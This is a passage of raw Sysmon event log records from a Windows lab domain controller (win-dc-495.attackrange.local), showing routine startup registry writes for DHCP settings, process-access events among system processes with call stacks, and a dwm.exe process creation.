13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x60059c56) 13241300x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x60059a94) 13241300x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x6005954e) 13241300x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x60058e46) 13241300x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 13241300x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.580{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.580{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.564{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.564{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E46-6005-0E00-00000000A301}10801320C:\Windows\system32\LogonUI.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E44-6005-0A00-00000000A301}8481104C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0800-00000000A301}720736C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0900-00000000A301}7961068C:\Windows\system32\winlogon.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.552{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{59A5CD1D-8E46-6005-A6C5-000000000000}0xc5a61SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM